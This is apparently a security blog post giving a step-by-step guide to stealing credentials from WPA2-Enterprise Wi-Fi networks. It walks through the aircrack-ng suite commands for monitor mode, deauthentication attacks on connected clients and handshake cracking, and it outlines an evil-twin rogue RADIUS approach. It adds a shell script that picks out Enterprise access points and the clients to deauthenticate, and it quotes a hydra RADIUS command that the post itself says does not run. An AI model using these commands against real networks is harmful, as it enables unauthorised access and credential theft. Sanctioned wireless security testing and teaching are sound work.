Blog | G5 Cyber Security

WPA2 Enterprise WiFi Hacking

TL;DR

This guide explains how to steal credentials from a WPA2-Enterprise (802.1X/RADIUS) wifi network, allowing you to gain unauthorised access. Warning: This is illegal without explicit permission. Use this information for educational purposes only and on networks you own or have permission to test.

Prerequisites

Steps

  1. Put your wireless adapter into monitor mode: This lets it capture every 802.11 frame on a channel, not only the traffic of a network you are joined to.
    sudo airmon-ng start wlan0

    This will likely create a new interface like wlan0mon. Use this interface in subsequent steps. If NetworkManager or wpa_supplicant keeps resetting the card, stop them first (airmon-ng check kill does this for you).

  2. Identify the target network: Use airodump-ng to scan for nearby networks and find your target WPA2-Enterprise network.
    sudo airodump-ng wlan0mon

    Note the BSSID (MAC address) of the access point and the channel it’s on. In the airodump-ng listing an Enterprise network shows AUTH as MGT; a pre-shared-key network shows PSK, and that distinction decides whether step 4 can work at all. Before moving on, restart airodump-ng locked to the target channel and BSSID and writing to disk (the -c, --bssid and -w options); without -w nothing is saved and there will be no capture file to crack.

  3. Capture the handshake: With airodump-ng writing to disk, wait for a client to (re)connect. To speed this up, deauthenticate a connected client; it will reassociate, run 802.1X/EAP again and complete a fresh 4-way EAPOL handshake.
    sudo aireplay-ng -0 1 -a [BSSID] -c [Client MAC Address] wlan0mon

    Replace [BSSID] with the access point’s BSSID and [Client MAC Address] with a connected client’s MAC address, taken from airodump-ng’s station table (only stations whose BSSID column matches the target are actually associated). The goal is to capture an EAPOL handshake. If the network enforces 802.11w (Protected Management Frames), unauthenticated deauthentication frames are dropped and this shortcut does not work.

  4. Crack the handshake: Once you have the capture file (.cap), aircrack-ng can attempt a dictionary attack against it.
    sudo aircrack-ng -w /path/to/wordlist.txt [handshake_file].cap

    Replace /path/to/wordlist.txt with the path to your wordlist file (e.g., rockyou.txt) and [handshake_file].cap with the name of your captured handshake file. The caveat that matters for this guide: a dictionary attack on the 4-way handshake only works for WPA2-Personal, where the PMK is derived from the passphrase and the SSID. On a WPA2-Enterprise network the PMK comes from the MSK negotiated by the EAP method between client and RADIUS server, so there is no passphrase to guess and aircrack-ng fails no matter how good the wordlist is; this step only succeeds if the target turns out to be a PSK network after all. Against a genuine Enterprise network the credential worth attacking is the user’s inner EAP credential (commonly MSCHAPv2 inside PEAP or EAP-TTLS). It is obtained with an evil-twin access point backed by a rogue RADIUS server (hostapd-wpe or eaphammer) that lets the client attempt authentication and logs the challenge/response; the challenge/response is then cracked offline with asleap or hashcat. Clients that validate the RADIUS server certificate refuse to authenticate to the rogue server, which is the control to check for.

  5. RADIUS Dictionary Attack: WPA2-Enterprise delegates authentication to a RADIUS server, so when the handshake cannot be cracked it is tempting to target the RADIUS server directly. Two things stand in the way.
    • Identify RADIUS Server: RADIUS (UDP 1812 for authentication, 1813 for accounting) runs between the access point or controller and the server on the wired network. It never appears in a wireless capture, so Wireshark over the monitor-mode capture will not reveal the server’s IP address; you only learn it once you already have a foothold on the wired side.
    • RADIUS Dictionary Attack Tools: The command usually quoted for this step does not run, because neither hydra nor Medusa ships a RADIUS module:
      hydra -l [username] -P /path/to/passwordlist.txt [radius_server_ip] radius
      Online guessing against RADIUS would also need the shared secret the access point uses to sign requests, which the attacker does not have, and user accounts usually lock out after a handful of failures. In practice credentials come from an offline attack on authentication material captured over the air, not from the RADIUS server itself.
  6. Post-Exploitation: With a working username and password you can join the network as that user, which on an Enterprise network means configuring your client (wpa_supplicant or the OS supplicant) for the same EAP method with those credentials. If the network uses EAP-TLS, clients authenticate with certificates rather than passwords, and a stolen password alone does not get you on.
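The target selection in steps 2 and 3 is easier to do from the CSV file that airodump-ng writes alongside the capture (with -w capture it is capture-01.csv) than from the live screen. The script below is an added example, not code from the original post: it pulls the WPA2-Enterprise (AUTH = MGT) access points out of such a CSV and lists the clients associated with a given BSSID, i.e. the [BSSID], channel and [Client MAC Address] the aireplay-ng command needs. The function names are hypothetical, and the sample CSV it embeds is constructed in the shape airodump-ng writes (AP table, blank line, station table) so it runs offline.

```shell
#!/bin/sh
# Added example: parse an airodump-ng CSV to find WPA2-Enterprise APs and
# their associated clients. Function names are hypothetical.
set -eu

# Constructed sample in airodump-ng's CSV layout (AP table, blank line,
# station table). Real files use the same column order.
write_sample_csv() {
  cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, MGT, -45,      120,        0,   0.  0.  0.  0,   8, CorpWiFi, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -60,       80,        0,   0.  0.  0.  0,   7, HomeNet, 
AA:BB:CC:DD:EE:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN,      ,    , -70,       40,        0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50,       30, AA:BB:CC:DD:EE:01, CorpWiFi
11:22:33:44:55:77, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -55,       12, (not associated), CorpWiFi,HomeNet
11:22:33:44:55:88, 2024-01-01 10:03:00, 2024-01-01 10:05:00, -65,        8, AA:BB:CC:DD:EE:02, HomeNet
EOF
}

# Print "BSSID channel ESSID" for every AP whose Privacy mentions WPA2 and
# whose Authentication column is MGT (802.1X). PSK and open networks are
# skipped. Column 14 is the ESSID; an ESSID containing a comma would shift
# the fields, which is a known limit of splitting on ','.
list_enterprise_aps() {
  awk -F',' '
    /^Station MAC/ { exit }                  # AP table ends here
    /^BSSID/ || NF < 14 { next }             # header and blank lines
    {
      for (i = 1; i <= NF; i++) gsub(/^[ \t\r]+|[ \t\r]+$/, "", $i)
      if ($6 ~ /WPA2/ && $8 == "MGT") print $1, $4, $14
    }' "$1"
}

# Print the station MACs currently associated with the AP given as $2.
# Unassociated probers carry "(not associated)" in the BSSID column and are
# skipped. Only columns 1-6 are trimmed because "Probed ESSIDs" may itself
# contain commas.
list_clients_of() {
  awk -F',' -v ap="$2" '
    /^Station MAC/ { in_stations = 1; next }
    !in_stations || NF < 6 { next }
    {
      for (i = 1; i <= 6; i++) gsub(/^[ \t\r]+|[ \t\r]+$/, "", $i)
      if (toupper($6) == toupper(ap)) print $1
    }' "$1"
}

# Usage: ./enterprise_targets.sh capture-01.csv
# With no argument the constructed sample is used.
csv="${1:-}"
if [ -z "$csv" ]; then
  csv=$(mktemp)
  write_sample_csv "$csv"
fi
echo "WPA2-Enterprise access points (BSSID channel ESSID):"
list_enterprise_aps "$csv"
echo "Clients of AA:BB:CC:DD:EE:01:"
list_clients_of "$csv" AA:BB:CC:DD:EE:01
[ -n "${1:-}" ] || rm -f "$csv"
```

On the sample this reports only CorpWiFi (channel 6) as an Enterprise target and 11:22:33:44:55:66 as its associated client; HomeNet is filtered out because its AUTH column is PSK, and the station probing for CorpWiFi without being associated is not offered as a deauthentication target.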

Important Considerations
